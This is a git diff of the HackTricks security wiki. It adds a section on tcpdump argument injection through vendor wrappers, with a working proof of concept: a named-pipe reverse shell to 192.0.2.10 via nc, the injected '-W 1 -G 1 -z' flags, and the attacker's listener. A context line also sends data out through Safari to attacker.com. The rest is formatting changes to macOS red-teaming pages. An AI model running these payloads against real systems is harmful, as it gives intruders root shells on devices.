@@ -120,6 +120,52 @@ These primitives are less common than the *tar/rsync/zip* classics but worth che --- +## tcpdump rotation hooks (-G/-W/-z): RCE via argv injection in wrappers + +When a restricted shell or vendor wrapper builds a `tcpdump` command line by concatenating user-controlled fields (e.g., a "file name" parameter) without strict quoting/validation, you can smuggle extra `tcpdump` flags. The combo of `-G` (time-based rotation), `-W` (limit number of files), and `-z ` (post-rotate command) yields arbitrary command execution as the user running tcpdump (often root on appliances). + +Preconditions: + +- You can influence `argv` passed to `tcpdump` (e.g., via a wrapper like `/debug/tcpdump --filter=... --file-name=`). +- The wrapper does not sanitize spaces or `-`-prefixed tokens in the file name field. + +Classic PoC (executes a reverse shell script from a writable path): + +```sh +# Reverse shell payload saved on the device (e.g., USB, tmpfs) +cat > /mnt/disk1_1/rce.sh <<'EOF' +#!/bin/sh +rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f +EOF +chmod +x /mnt/disk1_1/rce.sh + +# Inject additional tcpdump flags via the unsafe "file name" field +/debug/tcpdump --filter="udp port 1234" \ + --file-name="test -i any -W 1 -G 1 -z /mnt/disk1_1/rce.sh" + +# On the attacker host +nc -6 -lvnp 4444 & +# Then send any packet that matches the BPF to force a rotation +printf x | nc -u -6 [victim_ipv6] 1234 +``` + +Details: + +- `-G 1 -W 1` forces an immediate rotate after the first matching packet. +- `-z ` runs the post-rotate command once per rotation. Many builds execute ` `. If `` is a script/interpreter, ensure the argument handling matches your payload. + +No-removable-media variants: + +- If you have any other primitive to write files (e.g., a separate command wrapper that allows output redirection), drop your script into a known path and trigger `-z /bin/sh /path/script.sh` or `-z /path/script.sh` depending on platform semantics. 
+- Some vendor wrappers rotate to attacker-controllable locations. If you can influence the rotated path (symlink/directory traversal), you can steer `-z` to execute content you fully control without external media. + +Hardening tips for vendors: + +- Never pass user-controlled strings directly to `tcpdump` (or any tool) without strict allowlists. Quote and validate. +- Do not expose `-z` functionality in wrappers; run tcpdump with a fixed safe template and disallow extra flags entirely. +- Drop tcpdump privileges (cap_net_admin/cap_net_raw only) or run under a dedicated unprivileged user with AppArmor/SELinux confinement. + + ## Detection & Hardening 1. **Disable shell globbing** in critical scripts: `set -f` (`set -o noglob`) prevents wildcard expansion. @@ -134,5 +180,7 @@ These primitives are less common than the *tar/rsync/zip* classics but worth che * Elastic Security – Potential Shell via Wildcard Injection Detected rule (last updated 2025) * Rutger Flohil – “macOS — Tar wildcard injection” (Dec 18 2024) +* GTFOBins – [tcpdump](https://gtfobins.github.io/gtfobins/tcpdump/) +* FiberGateway GR241AG – [Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/) -{{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/macos-hardening/macos-red-teaming/README.md b/src/macos-hardening/macos-red-teaming/README.md index d445b0599..1fd493336 100644 --- a/src/macos-hardening/macos-red-teaming/README.md +++ b/src/macos-hardening/macos-red-teaming/README.md @@ -12,6 +12,7 @@ If you manage to **compromise admin credentials** to access the management platf For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work: + {{#ref}} macos-mdm/ {{#endref}} 
@@ -99,6 +100,7 @@ The script [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-T And also about **MacOS** "special" **network** **protocols**: + {{#ref}} ../macos-security-and-privilege-escalation/macos-protocols.md {{#endref}} @@ -107,14 +109,17 @@ And also about **MacOS** "special" **network** **protocols**: In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages: + {{#ref}} ../../network-services-pentesting/pentesting-ldap.md {{#endref}} + {{#ref}} ../../windows-hardening/active-directory-methodology/ {{#endref}} + {{#ref}} ../../network-services-pentesting/pentesting-kerberos-88/ {{#endref}} @@ -223,6 +228,7 @@ mount -t smbfs //server/folder /local/mount/point The Keychain highly probably contains sensitive information that if accessed without generating a prompt could help to move forward a red team exercise: + {{#ref}} macos-keychain.md {{#endref}} @@ -251,4 +257,3 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md index abc9788fb..cf2d45a84 100644 --- a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md +++ b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md 
@@ -77,6 +77,7 @@ It's crucial to note that the ease of enrollment provided by DEP, while benefici Apple devices manufactured after 2010 generally have **12-character alphanumeric** serial numbers, with the **first three digits representing the manufacturing location**, the following **two** indicating the **year** and **week** of manufacture, the next **three** digits providing a **unique** **identifier**, and the **last** **four** digits representing the **model number**. + {{#ref}} macos-serial-number.md {{#endref}} @@ -196,6 +197,7 @@ Typically, **activation profile** provided by an MDM vendor will **include the f As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected: + {{#ref}} enrolling-devices-in-other-organisations.md {{#endref}} @@ -203,4 +205,3 @@ enrolling-devices-in-other-organisations.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/README.md index 20a76642a..5738286f5 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/README.md 
@@ -8,30 +8,35 @@ If you are not familiar with macOS, you should start learning the basics of macO - Special macOS **files & permissions:** + {{#ref}} macos-files-folders-and-binaries/ {{#endref}} - Common macOS **users** + {{#ref}} macos-users.md {{#endref}} - **AppleFS** + {{#ref}} macos-applefs.md {{#endref}} - The **architecture** of the k**ernel** + {{#ref}} mac-os-architecture/ {{#endref}} - Common macOS n**etwork services & protocols** + {{#ref}} macos-protocols.md {{#endref}} @@ -43,18 +48,21 @@ macos-protocols.md In companies **macOS** systems are highly probably going to be **managed with a MDM**. Therefore, from the perspective of an attacker is interesting to know **how that works**: + {{#ref}} ../macos-red-teaming/macos-mdm/ {{#endref}} ### MacOS - Inspecting, Debugging and Fuzzing + {{#ref}} macos-apps-inspecting-debugging-and-fuzzing/ {{#endref}} ## MacOS Security Protections + {{#ref}} macos-security-protections/ {{#endref}} @@ -75,6 +83,7 @@ Being able to **create a file** that is going to be **used by root**, allows a u For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` installers**: + {{#ref}} macos-files-folders-and-binaries/macos-installers-abuse.md {{#endref}} @@ -83,6 +92,7 @@ macos-files-folders-and-binaries/macos-installers-abuse.md Weird apps registered by file extensions could be abused and different applications can be register to open specific protocols + {{#ref}} macos-file-extension-apps.md {{#endref}} @@ -101,6 +111,7 @@ Follow these links to find different was to [**escalate privileges in TCC**](mac Of course from a red teams perspective you should be also interested in escalating to root. Check the following post for some hints: + {{#ref}} macos-privilege-escalation.md {{#endref}} @@ -120,4 +131,3 @@ macos-privilege-escalation.md {{#include ../../banners/hacktricks-training.md}} - 
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md index 4280561a8..e9e66db34 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md @@ -35,12 +35,14 @@ Moreover, **Mach and BSD each maintain different security models**: **Mach's** s The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware. + {{#ref}} macos-iokit.md {{#endref}} ### IPC - Inter Process Communication + {{#ref}} ../macos-proces-abuse/macos-ipc-inter-process-communication/ {{#endref}} @@ -51,6 +53,7 @@ macOS is **super restrictive to load Kernel Extensions** (.kext) because of the In the following page you can also see how to recover the `.kext` that macOS loads inside its **kernelcache**: + {{#ref}} macos-kernel-extensions.md {{#endref}} @@ -59,6 +62,7 @@ macos-kernel-extensions.md Instead of using Kernel Extensions macOS created the System Extensions, which offers in user level APIs to interact with the kernel. This way, developers can avoid to use kernel extensions. + {{#ref}} macos-system-extensions.md {{#endref}} @@ -71,4 +75,3 @@ macos-system-extensions.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md index f5f7102ce..7199ef495 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md 
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md @@ -250,6 +250,7 @@ int main() { You can grab a shellcode from: + {{#ref}} ../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -524,6 +525,7 @@ Therefore, to **improve the thread** it should call **`pthread_create_from_mach_ You can find **example dylibs** in (for example the one that generates a log and then you can listen to it): + {{#ref}} ../../macos-dyld-hijacking-and-dyld_insert_libraries.md {{#endref}} @@ -814,6 +816,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector In this technique a thread of the process is hijacked: + {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md {{#endref}} @@ -826,6 +829,7 @@ XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication For more information about how this **communication work** on how it **could be vulnerable** check: + {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/ {{#endref}} @@ -836,6 +840,7 @@ MIG was created to **simplify the process of Mach IPC** code creation. It basica For more info check: + {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md {{#endref}} @@ -851,4 +856,3 @@ For more info check: {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md index 8160e7990..38945205e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md 
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md @@ -138,6 +138,7 @@ The params this function expects are: See how to **get this info easily with `lldb` in ARM64** in this page: + {{#ref}} arm64-basic-assembly.md {{#endref}} @@ -557,6 +558,7 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist **Checkout the following page** to find out how you can find which app is responsible of **handling the specified scheme or protocol:** + {{#ref}} ../macos-file-extension-apps.md {{#endref}} @@ -635,4 +637,3 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md index 54c07417b..bea7bf252 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md @@ -75,6 +75,7 @@ open -j -a Safari "https://attacker.com?data=data%20to%20exfil" If you can **inject code into a process** that is allowed to connect to any server you could bypass the firewall protections: + {{#ref}} macos-proces-abuse/ {{#endref}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md index 27cb6f957..aff6ed64a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md 
@@ -35,12 +35,14 @@ MacOS stores information such as passwords in several places: + {{#ref}} macos-sensitive-locations.md {{#endref}} ### Vulnerable pkg installers + {{#ref}} macos-installers-abuse.md {{#endref}} @@ -69,6 +71,7 @@ macos-installers-abuse.md A bundle is a **directory** which **looks like an object in Finder** (a Bundle example are `*.app` files). + {{#ref}} macos-bundles.md {{#endref}} @@ -235,6 +238,7 @@ The tool afscexpand can be used to force decompress a dile. Mac OS binaries usually are compiled as **universal binaries**. A **universal binary** can **support multiple architectures in the same file**. + {{#ref}} universal-binaries-and-mach-o-format.md {{#endref}} @@ -243,6 +247,7 @@ universal-binaries-and-mach-o-format.md ## macOS memory dumping + {{#ref}} macos-memory-dumping.md {{#endref}} @@ -270,4 +275,3 @@ The directory `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/ {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md index 66f65d692..c9309a9ad 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md @@ -6,6 +6,7 @@ If you came here looking for TCC privilege escalation go to: + {{#ref}} macos-security-protections/macos-tcc/ {{#endref}} @@ -14,6 +15,7 @@ macos-security-protections/macos-tcc/ Please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see: + {{#ref}} ../../linux-hardening/privilege-escalation/ {{#endref}} 
@@ -240,6 +242,7 @@ A more detailed explanation can be [**found in the original report**](https://th This can be useful to escalate privileges: + {{#ref}} macos-files-folders-and-binaries/macos-sensitive-locations.md {{#endref}} @@ -247,4 +250,3 @@ macos-files-folders-and-binaries/macos-sensitive-locations.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md index 172e77dba..a9559a2e4 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md @@ -151,6 +151,7 @@ MacOS, like any other operating system, provides a variety of methods and mechan Library Injection is a technique wherein an attacker **forces a process to load a malicious library**. Once injected, the library runs in the context of the target process, providing the attacker with the same permissions and access as the process. + {{#ref}} macos-library-injection/ {{#endref}} @@ -159,6 +160,7 @@ macos-library-injection/ Function Hooking involves **intercepting function calls** or messages within a software code. By hooking functions, an attacker can **modify the behavior** of a process, observe sensitive data, or even gain control over the execution flow. + {{#ref}} macos-function-hooking.md {{#endref}} @@ -167,6 +169,7 @@ macos-function-hooking.md Inter Process Communication (IPC) refers to different methods by which separate processes **share and exchange data**. While IPC is fundamental for many legitimate applications, it can also be misused to subvert process isolation, leak sensitive information, or perform unauthorized actions. + {{#ref}} macos-ipc-inter-process-communication/ {{#endref}} 
@@ -175,6 +178,7 @@ macos-ipc-inter-process-communication/ Electron applications executed with specific env variables could be vulnerable to process injection: + {{#ref}} macos-electron-applications-injection.md {{#endref}} @@ -183,6 +187,7 @@ macos-electron-applications-injection.md It's possible to use the flags `--load-extension` and `--use-fake-ui-for-media-stream` to perform a **man in the browser attack** allowing to steal keystrokes, traffic, cookies, inject scripts in pages...: + {{#ref}} macos-chromium-injection.md {{#endref}} @@ -191,6 +196,7 @@ macos-chromium-injection.md NIB files **define user interface (UI) elements** and their interactions within an application. However, they can **execute arbitrary commands** and **Gatekeeper doesn't stop** an already executed application from being executed if a **NIB file is modified**. Therefore, they could be used to make arbitrary programs execute arbitrary commands: + {{#ref}} macos-dirty-nib.md {{#endref}} @@ -199,6 +205,7 @@ macos-dirty-nib.md It's possible to abuse certain java capabilities (like the **`_JAVA_OPTS`** env variable) to make a java application execute **arbitrary code/commands**. + {{#ref}} macos-java-apps-injection.md {{#endref}} @@ -207,6 +214,7 @@ macos-java-apps-injection.md It's possible to inject code into .Net applications by **abusing the .Net debugging functionality** (not protected by macOS protections such as runtime hardening). + {{#ref}} macos-.net-applications-injection.md {{#endref}} @@ -215,6 +223,7 @@ macos-.net-applications-injection.md Check different options to make a Perl script execute arbitrary code in: + {{#ref}} macos-perl-applications-injection.md {{#endref}} @@ -223,6 +232,7 @@ macos-perl-applications-injection.md I't also possible to abuse ruby env variables to make arbitrary scripts execute arbitrary code: + {{#ref}} macos-ruby-applications-injection.md {{#endref}} 
@@ -276,4 +286,3 @@ Note that to call that function you need to be **the same uid** as the one runni {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md index 36672d73d..bda3e8dcf 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md @@ -534,6 +534,7 @@ Any thread can get this port calling to **`mach_thread_sef`**. You can grab a shellcode from: + {{#ref}} ../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -814,6 +815,7 @@ Therefore, to **improve the thread** it should call **`pthread_create_from_mach_ You can find **example dylibs** in (for example the one that generates a log and then you can listen to it): + {{#ref}} ../macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md {{#endref}} @@ -1104,6 +1106,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector In this technique a thread of the process is hijacked: + {{#ref}} macos-thread-injection-via-task-port.md {{#endref}} @@ -1258,6 +1261,7 @@ XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication For more information about how this **communication work** on how it **could be vulnerable** check: + {{#ref}} macos-xpc/ {{#endref}} @@ -1270,6 +1274,7 @@ MIC basically **generates the needed code** for server and client to communicate For more info check: + {{#ref}} macos-mig-mach-interface-generator.md {{#endref}} 
@@ -1287,4 +1292,3 @@ macos-mig-mach-interface-generator.md {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md index a20a23073..a42b8516f 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md @@ -126,6 +126,7 @@ Applications can **subscribe** to different event **messages**, enabling them to When a process tries to call a method from via an XPC connection, the **XPC service should check if that process is allowed to connect**. Here are the common ways to check that and the common pitfalls: + {{#ref}} macos-xpc-connecting-process-check/ {{#endref}} @@ -134,6 +135,7 @@ macos-xpc-connecting-process-check/ Apple also allows apps to **configure some rights and how to get them** so if the calling process have them it would be **allowed to call a method** from the XPC service: + {{#ref}} macos-xpc-authorization.md {{#endref}} @@ -486,4 +488,3 @@ It's possible to find thee communications using `netstat`, `nettop` or the open {{#include ../../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md index a91d747b4..b8ede1328 100644 
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md @@ -31,6 +31,7 @@ An example could be found in [EvenBetterAuthorizationSample](https://github.com/ For more information about how to properly configure this check: + {{#ref}} macos-xpc-connecting-process-check/ {{#endref}} @@ -442,4 +443,3 @@ int main(void) { {{#include ../../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md index 2279ec6cb..7fe7c67a6 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md @@ -26,12 +26,14 @@ When a connection is stablished to an XPC service, the server will check if the For more information about the PID reuse attack check: + {{#ref}} macos-pid-reuse.md {{#endref}} For more information **`xpc_connection_get_audit_token`** attack check: + {{#ref}} macos-xpc_connection_get_audit_token-attack.md {{#endref}} @@ -95,4 +97,3 @@ if ((csFlags & (cs_hard | cs_require_lv)) { {{#include ../../../../../../banners/hacktricks-training.md}} - 
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md index 968740441..4ee3d0353 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md @@ -8,6 +8,7 @@ If you don't know what Mach Messages are start checking this page: + {{#ref}} ../../ {{#endref}} @@ -19,6 +20,7 @@ Mach messages are sent over a _mach port_, which is a **single receiver, multipl If you don't know how a XPC connection is established check: + {{#ref}} ../ {{#endref}} @@ -125,4 +127,3 @@ Below is a visual representation of the described attack scenario: {{#include ../../../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md index 3f0ec0dae..589ffaae1 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md @@ -9,6 +9,7 @@ Take a look on how Dyld loads libraries inside binaries in: + {{#ref}} macos-dyld-process.md {{#endref}} 
@@ -50,6 +51,7 @@ You can also load a library if it's **signed with the same certificate as the bi Find a example on how to (ab)use this and check the restrictions in: + {{#ref}} macos-dyld-hijacking-and-dyld_insert_libraries.md {{#endref}} @@ -108,6 +110,7 @@ The way to **escalate privileges** abusing this functionality would be in the ra **Example** + {{#ref}} macos-dyld-hijacking-and-dyld_insert_libraries.md {{#endref}} @@ -339,4 +342,3 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md index eba5f10fd..9ab75e67d 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md @@ -19,6 +19,7 @@ Dyld will be loaded by **`dyldboostrap::start`**, which will also load things su **`dyls::_main()`** is the entry point of dyld and it's first task is to run `configureProcessRestrictions()`, which usually restricts **`DYLD_*`** environment variables explained in: + {{#ref}} ./ {{#endref}} @@ -316,4 +317,3 @@ find . -type f | xargs grep strcmp| grep key,\ \" | cut -d'"' -f2 | sort -u {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md index 96f888304..8dd4b68bb 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md 
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md @@ -8,6 +8,7 @@ Gatekeeper is usually used to refer to the combination of **Quarantine + Gatekee More information in: + {{#ref}} macos-gatekeeper.md {{#endref}} @@ -18,6 +19,7 @@ macos-gatekeeper.md ### SIP - System Integrity Protection + {{#ref}} macos-sip.md {{#endref}} @@ -26,6 +28,7 @@ macos-sip.md MacOS Sandbox **limits applications** running inside the sandbox to the **allowed actions specified in the Sandbox profile** the app is running with. This helps to ensure that **the application will be accessing only expected resources**. + {{#ref}} macos-sandbox/ {{#endref}} @@ -34,6 +37,7 @@ macos-sandbox/ **TCC (Transparency, Consent, and Control)** is a security framework. It's designed to **manage the permissions** of applications, specifically by regulating their access to sensitive features. This includes elements like **location services, contacts, photos, microphone, camera, accessibility, and full disk access**. TCC ensures that apps can only access these features after obtaining explicit user consent, thereby bolstering privacy and control over personal data. + {{#ref}} macos-tcc/ {{#endref}} @@ -42,6 +46,7 @@ macos-tcc/ Launch constraints in macOS are a security feature to **regulate process initiation** by defining **who can launch** a process, **how**, and **from where**. Introduced in macOS Ventura, they categorize system binaries into constraint categories within a **trust cache**. Every executable binary has set **rules** for its **launch**, including **self**, **parent**, and **responsible** constraints. Extended to third-party apps as **Environment** Constraints in macOS Sonoma, these features help mitigate potential system exploitations by governing process launching conditions. + {{#ref}} macos-launch-environment-constraints.md {{#endref}} 
@@ -145,4 +150,3 @@ References and **more information about BTM**: {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md index 68320b06b..72de19ae6 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md @@ -160,6 +160,7 @@ ls -le test Not really needed but I leave it there just in case: + {{#ref}} macos-xattr-acls-extra-stuff.md {{#endref}} @@ -469,4 +470,3 @@ This feature is particularly useful for preventing certain classes of security v {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md index b0a12e881..a6c1c6824 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md @@ -287,6 +287,7 @@ On macOS, unlike iOS where processes are sandboxed from the start by the kernel, Processes are automatically Sandboxed from userland when they start if they have the entitlement: `com.apple.security.app-sandbox`. For a detailed explanation of this process check: + {{#ref}} macos-sandbox-debug-and-bypass/ {{#endref}} @@ -401,4 +402,3 @@ Sandbox also has a user daemon running exposing the XPC Mach service `com.apple. {{#include ../../../../banners/hacktricks-training.md}} - 
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md index 431cc6ffb..53ebae74f 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md @@ -30,6 +30,7 @@ This is what was done in [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023 In the [**last examples of Word sandbox bypass**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv) can be appreciated how the **`open`** cli functionality could be abused to bypass the sandbox. + {{#ref}} macos-office-sandbox-bypasses.md {{#endref}} @@ -47,6 +48,7 @@ For this you might even need **2 steps**: To make a process with a **more permis Check this page about **Auto Start locations**: + {{#ref}} ../../../../macos-auto-start-locations.md {{#endref}} @@ -55,6 +57,7 @@ Check this page about **Auto Start locations**: If from then sandbox process you are able to **compromise other processes** running in less restrictive sandboxes (or none), you will be able to escape to their sandboxes: + {{#ref}} ../../../macos-proces-abuse/ {{#endref}} @@ -270,6 +273,7 @@ Note that even if some **actions** might be **allowed by at he sandbox** if an a For more information about **Interposting** check: + {{#ref}} ../../../macos-proces-abuse/macos-function-hooking.md {{#endref}} @@ -501,4 +505,3 @@ Process 2517 exited with status = 0 (0x00000000) {{#include ../../../../../banners/hacktricks-training.md}} - 
